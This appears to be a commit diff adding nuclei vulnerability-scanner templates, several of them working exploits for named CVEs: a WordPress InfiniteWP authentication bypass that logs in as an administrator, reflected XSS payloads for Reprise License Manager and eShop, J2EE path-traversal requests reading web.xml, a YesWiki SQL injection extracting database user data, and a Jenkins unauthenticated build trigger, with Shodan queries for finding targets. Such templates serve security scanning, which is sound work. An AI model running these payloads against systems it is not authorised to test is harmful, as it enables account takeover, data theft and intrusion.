up PoCs 2022-08-10

Author: hktalent

config/nuclei-templates/cves/2020/CVE-2020-8772.yaml

@@ -0,0 +1,74 @@
+id: CVE-2020-8772
+
+info:
+  name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
+  author: princechaddha,scent2d
+  severity: critical
+  description: |
+    The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
+    authorization check in iwp_mmb_set_request in init.php. Any attacker who
+    knows the username of an administrator can log in.
+  reference:
+    - https://wpscan.com/vulnerability/10011
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8772
+    - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
+    - https://wpvulndb.com/vulnerabilities/10011
+  remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-8772
+    cwe-id: CWE-862
+  metadata:
+    verified: "true"
+  tags: cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /?author=1 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Language: en-US,en;q=0.9
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Content-Type: application/x-www-form-urlencoded
+
+        _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}}
+
+    redirects: true
+    extractors:
+      - type: regex
+        name: username
+        internal: true
+        group: 1
+        part: body
+        regex:
+          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
+
+      - type: regex
+        name: username
+        internal: true
+        group: 1
+        part: header
+        regex:
+          - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "wordpress_logged_in"
+
+      - type: word
+        words:
+          - "<IWPHEADER>"
+
+        part: body
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-45422.yaml

@@ -0,0 +1,44 @@
+id: CVE-2021-45422
+
+info:
+  name: Reprise License Manager 14.2 - Reflected XSS
+  author: edoardottt
+  severity: medium
+  description: |
+    Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required.
+  reference:
+    - https://seclists.org/fulldisclosure/2022/Jan/31
+    - https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45422
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-45422
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Reprise License"
+    verified: "true"
+  tags: cve,cve2021,reprise,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value=""><script>alert(document.domain)</script>"><input type='
+          - 'value: "><script>alert(document.domain)</script>)<br>'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-35493.yaml

@@ -0,0 +1,35 @@
+id: CVE-2022-35493
+
+info:
+  name: eShop - Cross-site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
+  reference:
+    - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35493
+  metadata:
+    verified: true
+    shodan-query: http.html:"eShop - Multipurpose Ecommerce"
+  tags: cve,cve2022,eshop,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Search Result for \"><img src=x onerror=alert(document.domain)>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-36883.yaml

@@ -0,0 +1,37 @@
+id: CVE-2022-36883
+info:
+  name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
+  author: c-sh0
+  severity: high
+  description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
+  reference:
+    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-36883
+    cwe-id: CWE-862
+  metadata:
+    shodan-query: X-Jenkins
+    verified: "true"
+  tags: cve,cve2022,jenkins,plugin,git
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "repository:"
+          - "SCM API plugin"
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/mybb-forum-detect.yaml

@@ -0,0 +1,25 @@
+id: mybb-forum-detect
+
+info:
+  name: MyBB Forum Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"MyBB"
+  tags: panel,mybb,forum
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/portal.php'
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'MyBB Forum'
+          - '<title>MyBB'
+        condition: or

config/nuclei-templates/exposed-panels/mybb/mybb-forum-install.yaml

@@ -0,0 +1,34 @@
+id: mybb-forum-install
+
+info:
+  name: MyBB Exposed Installation
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.title:"MyBB"
+  tags: panel,mybb,forum
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/install/index.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'MyBB'
+          - 'Installation Wizard'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - 'currently locked'
+        negative: true
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/wordpress/wp-install.yaml

@@ -0,0 +1,26 @@
+id: wp-install
+
+info:
+  name: WordPress Exposed Installation
+  author: princechaddha
+  severity: high
+  reference:
+    - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
+  tags: panel,wordpress
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/install.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>WordPress &rsaquo; Installation</title>"
+          - "Site Title"
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/technologies/yeswiki-detect.yaml

@@ -0,0 +1,30 @@
+id: yeswiki-detect
+
+info:
+  name: YesWiki Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'yeswiki-search'
+          - 'yeswiki-base'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/vulnerabilities/generic/generic-j2ee-lfi.yaml

@@ -0,0 +1,44 @@
+id: generic-j2ee-lfi
+
+info:
+  name: Generic J2EE LFI scan
+  author: davidfegyver
+  severity: high
+  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
+  metadata:
+    verified: true
+    shodan-query: http.title:"J2EE"
+  tags: lfi,generic,j2ee
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/WEB-INF/web.xml"
+      - "{{BaseURL}}/.//WEB-INF/web.xml"
+      - "{{BaseURL}}/../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<servlet-name>"
+          - "</web-app>"
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml

@@ -0,0 +1,33 @@
+id: yeswiki-sql
+
+info:
+  name: YesWiki - SQL Injection
+  author: arafatansari
+  severity: critical
+  description: |
+    YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL.
+  reference:
+    - https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'c8c605999f3d8352d7bb792cf3f'
+
+      - type: status
+        status:
+          - 200